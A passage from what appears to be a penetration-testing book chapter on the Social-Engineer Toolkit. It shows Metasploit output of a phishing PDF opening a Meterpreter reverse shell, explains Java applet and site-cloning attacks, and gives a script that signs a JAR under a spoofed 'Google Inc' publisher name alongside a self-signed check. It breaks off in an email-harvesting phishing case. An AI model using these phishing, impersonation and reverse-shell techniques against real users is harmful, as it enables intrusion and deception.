142

Chapter 10

The target opens the PDF thinking it’s legitimate, and his system is instantly compromised. On the attacker’s side, you see the following:

[*] Started reverse handler on 10.10.1.112:443
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (748032 bytes) to 10.10.1.102
[*] Meterpreter session 1 opened (10.10.1.112:443 -> 10.10.1.102:58087)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2976 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Bob\Desktop>

This example used a spear-phishing attack to target one user, but SET can also be used to attack multiple targets using the “mass email” option. You can also create customized templates that can be reused, instead of using the prebuilt templates included in SET.

Web Attack Vectors

Web attack vectors are probably one of the most advanced and exciting 
aspects of SET, because they are specifically crafted to be believable and 
enticing to the target. SET can clone websites that look identical to trusted 
sites, helping to ensure that the target will think he is visiting a legitimate site.

Java Applet

The Java applet attack is one of the most successful attack vectors in SET. The applet itself was created by one of the SET developers, Thomas Werth. This attack introduces a malicious Java applet that does smart browser detection (so your exploit works) and delivers a payload to the target’s machine. The Java applet attack is not considered a vulnerability by Java: it exploits no flaw in the runtime, and the payload runs only because the target agrees to run the applet. When a target browses the malicious site, he is presented with a warning asking if he wants to run an untrusted Java applet. Because Java lets you sign an applet with a self-signed certificate bearing any publisher name you choose, you could call the publisher Google, Microsoft, or any other string you like, and that name is what the target sees in the warning. By editing the set_config file and setting WEBATTACK_EMAIL to ON, you can also incorporate mass emails with this attack.
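The following is an added example, not code from SET or from the book, showing the two halves of the point above: a signed JAR whose certificate claims any publisher name you like, and the check a defender can run against it. It assumes a JDK (keytool, jar and jarsigner) is on PATH; the keystore name, alias, password and publisher string are made up, and the JAR holds a placeholder text file rather than a real applet.

```shell
#!/bin/sh
# Added example: sign a JAR with a self-signed certificate that claims an
# arbitrary publisher name, then inspect it the way a defender should.
# Assumes keytool, jar and jarsigner (a JDK) are on PATH. All names are
# invented for the example.
set -eu

WORK=$(mktemp -d)
KEYSTORE="$WORK/attacker.jks"   # assumed name
JAR="$WORK/applet.jar"          # assumed name

# 1. Generate a key pair whose certificate subject claims to be a well-known
#    publisher. keytool never checks that the name is actually yours.
make_fake_signer() {
    keytool -genkeypair -keystore "$KEYSTORE" -storepass changeit \
        -keypass changeit -alias publisher -keyalg RSA -keysize 2048 \
        -validity 365 -dname "CN=Google Inc, O=Google Inc, C=US" \
        >/dev/null 2>&1
}

# 2. Build a stand-in JAR (one text file; a real applet would carry .class
#    files) and sign it with that key.
build_and_sign() {
    echo "placeholder" > "$WORK/Applet.txt"
    ( cd "$WORK" && jar cf applet.jar Applet.txt )
    jarsigner -keystore "$KEYSTORE" -storepass changeit "$JAR" publisher \
        >/dev/null 2>&1
}

# 3a. What the target sees: the signature verifies and the signer name is
#     whatever was typed into -dname.
signer_name() {
    jarsigner -verify -verbose -certs "$JAR" 2>/dev/null \
        | grep -o 'CN=[^,]*' | head -n 1
}

# 3b. What a check reveals: jarsigner (Java 7 and later) warns that the
#     signer certificate is self-signed, i.e. it chains to no trust anchor.
#     That warning, not the publisher string, is the signal worth acting on.
is_self_signed() {
    jarsigner -verify -verbose -certs "$JAR" 2>&1 | grep -qi 'self-signed'
}

# Stand-alone run: print the name the prompt would show and the verdict.
if [ "${1:-}" = "run" ]; then
    make_fake_signer
    build_and_sign
    echo "publisher shown to target: $(signer_name)"
    if is_self_signed; then
        echo "verdict: self-signed signer, not chained to any trusted CA"
    else
        echo "verdict: signer chains to a trust anchor"
    fi
fi
```

Run it with `sh applet_signer.sh run`. The publisher line prints `CN=Google Inc` exactly as requested, while the verdict line reports the self-signed chain; the same check applies to any JAR a user is being asked to trust.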

Let’s walk through a real-world example—a penetration test performed for a Fortune 1000 company. First, a copycat domain name, similar to that of the actual company website, was registered. Next, the attacker scraped the Internet looking for @<company>.com email addresses using the harvester module within Metasploit. After extracting 200 email addresses from public websites, mass emails were sent to these addresses. The attack email claimed to be from the company’s communications department and asked the employee